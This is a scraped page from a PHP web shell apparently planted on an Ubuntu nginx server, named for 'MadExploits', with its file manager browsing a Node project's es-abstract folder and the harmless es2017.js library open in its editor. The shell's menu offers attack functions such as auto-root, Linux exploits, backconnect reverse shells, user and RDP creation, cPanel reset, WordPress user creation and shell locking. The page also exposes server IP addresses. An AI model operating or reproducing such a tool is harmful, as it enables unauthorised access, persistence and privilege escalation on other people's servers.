Linux ubuntu22 5.15.0-133-generic #144-Ubuntu SMP Fri Feb 7 20:47:38 UTC 2025 x86_64
nginx/1.18.0
: 128.199.27.159 | : 216.73.216.1
Cant Read [ /etc/named.conf ]
8.1.31
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
amatya /
node_modules /
es-abstract /
[ HOME SHELL ]
Name
Size
Permission
Action
helpers
[ DIR ]
drwxr-xr-x
operations
[ DIR ]
drwxr-xr-x
test
[ DIR ]
drwxr-xr-x
.editorconfig
276
B
-rw-r--r--
.eslintrc
551
B
-rw-r--r--
.nycrc
234
B
-rw-r--r--
.travis.yml
8.33
KB
-rw-r--r--
CHANGELOG.md
7.23
KB
-rw-r--r--
GetIntrinsic.js
8.38
KB
-rw-r--r--
LICENSE
1.05
KB
-rw-r--r--
Makefile
3.75
KB
-rw-r--r--
README.md
1.81
KB
-rw-r--r--
es2015.js
24.25
KB
-rw-r--r--
es2016.js
454
B
-rw-r--r--
es2017.js
1.56
KB
-rw-r--r--
es2018.js
4.32
KB
-rw-r--r--
es5.js
6.15
KB
-rw-r--r--
es6.js
53
B
-rw-r--r--
es7.js
53
B
-rw-r--r--
index.js
478
B
-rw-r--r--
package.json
2.41
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : es2017.js
'use strict'; var bind = require('function-bind'); var ES2016 = require('./es2016'); var assign = require('./helpers/assign'); var forEach = require('./helpers/forEach'); var GetIntrinsic = require('./GetIntrinsic'); var $TypeError = GetIntrinsic('%TypeError%'); var $isEnumerable = bind.call(Function.call, GetIntrinsic('%ObjectPrototype%').propertyIsEnumerable); var $pushApply = bind.call(Function.apply, GetIntrinsic('%ArrayPrototype%').push); var ES2017 = assign(assign({}, ES2016), { ToIndex: function ToIndex(value) { if (typeof value === 'undefined') { return 0; } var integerIndex = this.ToInteger(value); if (integerIndex < 0) { throw new RangeError('index must be >= 0'); } var index = this.ToLength(integerIndex); if (!this.SameValueZero(integerIndex, index)) { throw new RangeError('index must be >= 0 and < 2 ** 53 - 1'); } return index; }, // https://www.ecma-international.org/ecma-262/8.0/#sec-enumerableownproperties EnumerableOwnProperties: function EnumerableOwnProperties(O, kind) { var keys = ES2016.EnumerableOwnNames(O); if (kind === 'key') { return keys; } if (kind === 'value' || kind === 'key+value') { var results = []; forEach(keys, function (key) { if ($isEnumerable(O, key)) { $pushApply(results, [ kind === 'value' ? O[key] : [key, O[key]] ]); } }); return results; } throw new $TypeError('Assertion failed: "kind" is not "key", "value", or "key+value": ' + kind); } }); delete ES2017.EnumerableOwnNames; // replaced with EnumerableOwnProperties module.exports = ES2017;
Close